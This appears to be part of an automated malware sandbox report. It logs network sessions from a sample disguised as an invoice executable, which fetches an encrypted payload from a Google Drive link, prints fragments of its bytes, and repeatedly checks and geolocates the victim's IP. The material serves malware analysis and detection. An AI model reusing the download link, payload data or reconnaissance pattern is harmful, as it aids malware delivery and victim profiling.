Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 13:50:54.421840906 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 18, 2024 13:50:55.665736914 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:50:55 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b41aef65e49aece2326e2994667c4dca
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 13:50:56.942181110 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 18, 2024 13:50:59.186085939 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:50:59 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: eef5ace68c7aeb71f489de0bb2373f71
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49716 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:50:59.985692978 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 18, 2024 13:51:00.820605993 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:00 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: eb4bc0ff6868ee22ad6cfd936fd880c4
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49718 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:01.592613935 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:02.421680927 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:02 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c4be3941fb14192f66ba4cd64da20e4d
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49720 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:03.181866884 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:05.026211023 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 006cd1952b5b97c1e319fb8c633f5b29
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49722 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:05.805912018 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:06.654702902 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:06 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1981f7d7739cadd7f384abd043d4e82b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49724 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:07.420520067 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:09.265789986 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:09 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5d9af711c0c2be957744a0b298351a63
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49726 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:10.022285938 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:10.867541075 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:10 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 245faa9cf855025c561266724a556968
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49728 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:51:11.848272085 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:51:12.689306974 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:51:12 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 65921174a3c0402e27e6dc8916c8d7d5
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 142.250.185.174 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:50:47 UTC | 216 | OUT | GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2024-11-18 12:50:47 UTC | 1610 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 18 Nov 2024 12:50:47 GMT
Location: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-MrJe7-hTRxv16hdi8PFHjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 172.217.16.193 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:50:48 UTC | 258 | OUT | GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-11-18 12:50:50 UTC | 4915 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="YUWtBaypnzkWs212.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 275008
Last-Modified: Thu, 14 Nov 2024 21:35:51 GMT
X-GUploader-UploadID: AFiumC4HWxFb-XdJX552HMedwS5zS1PDSxBOJTl3ieKBp8T2PZ-1W_2JS1TMbtcaKhbuJi4MTvo
Date: Mon, 18 Nov 2024 12:50:50 GMT
Expires: Mon, 18 Nov 2024 12:50:50 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=II/sjQ==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                Data Ascii: 7;6.ftE1h{@/;i?Z/\G!%tb9|9*sCAm +b|Rt7$H%H[4(^#/Dz{\0L>tc RW<&"nN!$3"%sIH*1=*+0p}Sn |x7
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: 8f 9a 8a bd 22 3e 91 94 2b 0f 3a 9f 7c d3 51 51 24 08 a8 58 23 ee 2c b0 8c 0f 3d 97 ff db b1 0b 7c a0 05 b2 5e f3 4f 75 b8 8d a0 e3 4c e7 97 b0 b6 02 7e f2 45 cb 42 fd d6 2e 69 a9 ed 66 11 83 3b 5e 96 d5 80 9a c3 00 68 4d e9 26 be b0 cc 38 68 35 a2 1f 2e 4a 4c 5e ff 76 ea 07 d1 14 38 26 b6 ab 20 35 c8 53 eb ad 38 e6 d6 27 0d 40 ee 67 30 e0 0e 35 11 9a 77 a9 f5 b1 ee 69 fb 94 6a a2 a5 a2 a8 cc f2 46 e9 d1 b8 9f ec 62 5d 17 aa 5a 06 b1 c9 6b 12 e6 bf b7 2f 8e 9e 00 c2 3b 11 fa 9b f1 0c 9f 22 c6 80 b2 64 25 25 ed e7 ff c1 91 4c 71 a0 8b b3 33 76 77 55 42 6e 85 d0 6b 8f 35 67 71 2f c0 76 4a 3a a4 21 0f 4f 2f 5f 7a f8 cd 55 9a 5e 52 b7 c7 05 3a 2d ec 08 ac 3e 53 36 de 81 26 7d 67 79 5f fb b9 25 a6 aa 49 dd 17 5d ea 73 e1 ee ab 7d a8 5a 06 b4 57 4f 22 d7 e9 a1
                                                                                                                                Data Ascii: ">+:|QQ$X#,=|^OuL~EB.if;^hM&8h5.JL^v8& 5S8'@g05wijFb]Zk/;"d%%Lq3vwUBnk5gq/vJ:!O/_zU^R:->S6&}gy_%I]s}ZWO"
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: a4 38 28 d1 27 1c 68 90 59 21 e0 74 01 da 9a 73 cc 74 7d ee 63 83 ce 7a aa ab 8e 80 4d f6 38 d8 c7 46 98 95 d8 64 b5 a7 35 cb cf fa 61 12 f3 c5 33 2b e1 20 16 ea b0 11 eb 97 88 3d 9e 29 cb b9 be 01 25 25 ff 37 74 d1 b4 65 6d 8d 8b b9 2a 0e 6e 6d 20 1e 92 57 b6 8f 35 66 54 47 8b 32 4a 3e d2 9c 09 4f 5f 4f 3d c0 cd 55 9a 3a b9 a3 d4 7e 03 7d d5 c3 a7 40 18 48 f5 85 0e 33 4f 92 55 85 ac 36 aa d0 57 97 17 59 92 ce e4 fa cf 43 3a db 06 be 29 da dc d6 fb a0 d0 1c 56 70 5b ff 99 3d 82 1e 79 a1 0e c1 b6 de 00 a0 ff 24 a4 97 19 e5 4e 27 08 20 ff 8d 6d c1 c7 7f 15 3b 3a f6 56 7c 3d c7 39 cd eb e0 8d 78 6d 9b 65 ab 8d 30 7e 66 41 5d f8 fc 76 79 10 d5 68 88 fe 29 4b f7 34 17 3c c0 14 c0 7d 66 19 c5 26 dc 64 0a 3f 15 bf 63 8c 41 a2 a5 8c 1d f6 57 73 1b ca ab 85 5c 4a
                                                                                                                                Data Ascii: 8('hY!tst}czM8Fd5a3+ =)%%7tem*nm W5fTG2J>O_O=U:~}@H3OU6WYC:)Vp[=y$N' m;:V|=9xme0~fA]vyh)K4<}f&d?cAWs\J
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: 68 d6 3a e9 48 ac bc c7 14 3a 3c a6 6a ad 3e 59 5b e9 90 3a 16 34 92 5f f1 a0 2b bb c8 10 76 17 59 92 6c e1 f4 b4 c1 80 db 0c b4 4c 42 b3 0d fa ac da 14 24 1f 88 ff e9 52 39 1e 6f 83 78 c9 c8 96 00 80 fb 56 e7 97 31 96 3d 9b 02 20 e9 6f 90 c1 c7 74 30 05 12 62 5d 76 50 62 38 cd eb e7 0a 4b 08 ec 35 ab fd 96 f9 54 71 9b 21 ed 7c ab 1d 8d 1a dd f7 8b 1e 4c 6f 48 42 f8 10 62 5c de 4e da 46 a5 1b a8 6a ac 81 f5 b2 5d a2 a4 ad 64 6a d0 63 11 18 2c bc 39 57 e1 78 97 52 1a 5f 9e 03 5f a3 73 b5 df 39 ea 6d 41 02 56 85 0a 32 89 09 b9 23 5c bb c1 69 ce d0 32 42 a9 84 46 54 94 cc 47 f0 62 62 fb 98 fc e4 77 9f 80 31 43 74 df 20 18 ed 68 6e 7c fe 8e 30 e8 11 af ab 34 ab 21 a3 8f 3c b2 6d f5 cf 8f 48 25 03 4a 7f 20 7a 18 cb 39 9d 13 c8 c6 1c 88 11 63 5b e2 f0 cc c1 4a
                                                                                                                                Data Ascii: h:H:<j>Y[:4_+vYlLB$R9oxV1= ot0b]vPb8K5Tq!|LoHBb\NFj]djc,9WxR__s9mAV2#\i2BFTGbbw1Ct hn|04!<mH%J z9c[J
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: d5 18 03 86 46 fc 7c d1 35 cd 1d b2 4e 29 3b 5f 1c 07 4a ee 1c 4e 10 ab 62 df 54 af 6b 03 20 1d 9a 78 f8 5d 7c a9 88 7b 34 50 7a 7e 69 8e 99 24 7f 89 a6 84 7d 90 4e 86 71 2a a5 77 c5 55 7e f3 45 ff df 35 89 a8 17 93 7b d8 4f 6e cb 63 45 c9 45 30 48 7b ba 1b d5 94 c6 5e f8 ee a4 fd 9d 9d 9f 51 55 82 35 6b 43 f0 20 12 9b af 1d 6c 8e d6 64 c0 90 a9 ba 20 ac cb 8a d8 3a a3 6d cc 22 0f 49 25 03 7b a9 12 47 18 c1 2c f1 d3 e0 a4 16 a0 da bd 5b e8 f0 bf 03 34 62 05 c8 e3 ba 5f de 51 24 18 b3 a1 c0 a5 0b 61 9b b5 28 b7 3b 1e 13 3b ec df 4f ef fb 86 20 c0 3c 78 65 e3 71 0d 44 2f 7d 7a a1 6e 14 6a 60 39 07 30 f9 f2 46 2e f2 32 5c 68 ee 10 84 12 c6 10 4e b6 45 c5 e5 c2 b5 1a ed 0a 55 e9 c8 25 2d 27 49 2b 7a 26 66 41 18 3a 5a 4f c3 6f b3 2d 51 8d 7f e7 08 93 54 12 6c
                                                                                                                                Data Ascii: F|5N);_JNbTk x]|{4Pz~i$}Nq*wU~E5{OncEE0H{^QU5kC ld :m"I%{G,[4b_Q$a(;;O <xeqD/}znj`90F.2\hNEU%-'I+z&fA:ZOo-QTl
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: df 20 12 b7 87 7c 7c 84 bb ff a8 11 a9 bb 0f ac 47 a2 dd 3c c2 c9 d0 05 26 fd 25 03 65 f5 31 62 6a 94 25 82 63 42 81 05 f6 23 bd 5b e6 52 e9 db 46 53 0c db 94 09 7d bb 15 04 18 b7 d6 a1 80 17 19 c1 67 28 c7 93 36 77 3c 83 10 20 b3 f1 f8 17 d3 1e 67 87 65 71 0d 4f 0a 7a 0f 94 fe 04 1a b2 34 a4 18 4d f8 34 b9 40 17 34 32 e0 1f 84 68 0b f2 57 c8 77 c5 f4 c1 0a b2 b7 78 64 eb ed 43 fd 26 2a 2b 0a 8e 50 75 26 a6 2c 4f c9 c7 96 15 23 d4 70 e7 50 46 71 0b 18 7e e5 e8 9e ec f1 e2 39 6b 37 e2 ec fb 54 6b b7 70 93 2d cc a4 48 f4 7b f2 fa 10 cf 66 55 24 c0 0b 0e 90 6a d5 6e b3 37 d2 a0 5b 2f c3 32 1d 13 34 57 d3 d6 08 31 7e 42 75 af 92 f5 f0 92 7c fa 21 f9 da 7f 9e aa 00 66 72 4b e9 35 ff c2 09 bc 92 7a 0b 34 16 4c d7 30 72 f0 f3 ea 32 f9 31 31 2a d2 af 8e f7 4f 71
                                                                                                                                Data Ascii: ||G<&%e1bj%cB#[RFS}g(6w< geqOz4M4@42hWwxdC&*+Pu&,O#pPFq~9k7Tkp-H{fU$jn7[/24W1~Bu|!frK5z4L0r211*Oq
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: f3 22 5e a9 a3 10 f4 66 b6 d7 4e b2 67 8c f4 c5 a2 e5 a4 1b 55 98 9e e1 5f 0e 55 44 d9 84 43 5c 30 f0 66 4f c9 c9 e5 fc 23 d8 7a f4 69 4f 40 0b 12 7a 97 03 a3 ec 81 f0 00 c8 45 85 f1 ed da 14 bb 62 82 3b c8 e1 59 e5 66 8c 13 6e 8f 6c 55 20 c3 3e 0e 81 7d c3 df 69 12 fa 9e 5b 2f d8 30 47 2d 1c 35 d7 fe c9 ef 7e 48 1a 63 ec c2 fa 92 69 99 ca c1 da 0f 8c fc ba 66 72 45 8c 77 fe d1 26 c2 7a 56 57 23 9b 1d c6 21 7f ba 2b 98 1b e5 31 50 84 98 77 a6 43 45 71 6a 73 63 6d 95 e4 56 08 6a 05 ab 40 8c d0 61 ee 88 fa 72 69 5a ff 37 cf 58 26 0c fd ab ed 40 96 66 40 21 25 eb 7f 33 f9 a1 54 ff 7f 24 f1 35 e1 28 a1 6c 01 f0 66 79 1d 18 a4 b4 f8 f0 21 f4 8f a1 f2 53 bb 9f 04 62 22 9d 6d 2d 48 fb e7 bc c0 23 c7 ec a3 45 b6 83 fe 4b 12 67 8f e0 1a c6 52 02 bc 79 dc 0b 19 49
                                                                                                                                Data Ascii: "^fNgU_UDC\0fO#ziO@zEb;YfnlU >}i[/0G-5~HcifrEw&zVW#!+1PwCEqjscmVj@ariZ7X&@f@!%3T$5(lfy!Sb"m-H#EKgRyI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49714 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:50:56 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-11-18 12:50:56 UTC | 860 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:56 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35739
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxW9tW9SpCIlLnPTs0m6hQShTPiUBJbB2ky5H5TGdsn2f1zHc5RtKcNz8ngsbm%2FzmSq3OrTevK9PkW2JOxiLN%2BpUvsDhdCBjd33NAzM8%2F63zQ%2B%2B%2FdVJFmDuQpkOEi%2B9ZVpK2J%2BK9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816d148062cde-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1171&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2415346&cwnd=248&unsent_bytes=0&cid=66ef86e74a2ba8ee&ts=177&x=0"
2024-11-18 12:50:56 UTC | 358 | IN | Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:50:59 UTC | 63 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
2024-11-18 12:50:59 UTC | 848 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:59 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35742
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOgaV5QkXp%2FfdYWdVcXZL8LJEZskAUN4WOqrUVW9NjtHj8nhdwHrES5Qw3d4a4SFktIBVrULLFTfbI%2B1IHWggI4Nt0x2XWKRVTyZX2QsOT9ZZBDACyfuslrkU5i889AKknc5oCTM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816e45ae52cc3-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2039436&cwnd=251&unsent_bytes=0&cid=2b424b4d2dfb59d6&ts=175&x=0"
2024-11-18 12:50:59 UTC | 358 | IN | Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:01 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-11-18 12:51:01 UTC | 848 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:01 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35744
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=elHLwBlSM%2Ba3xRn48ac5MgP87hoTA3jymrvw3J4i9mcUQAwouQNRatr7dzDZpLz8Jo9G7VE20tQ8XX1wwEpkJQ0f6PzyrBj3zZt6mrK%2FywIrBjKxBtgtzzSTXc1PFSnCHKAK1qzZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816ee5bf44794-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1848117&cwnd=251&unsent_bytes=0&cid=8b0d774f2d9899f4&ts=150&x=0"
2024-11-18 12:51:01 UTC | 358 | IN | Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49719 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:03 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-11-18 12:51:03 UTC | 852 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:03 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35746
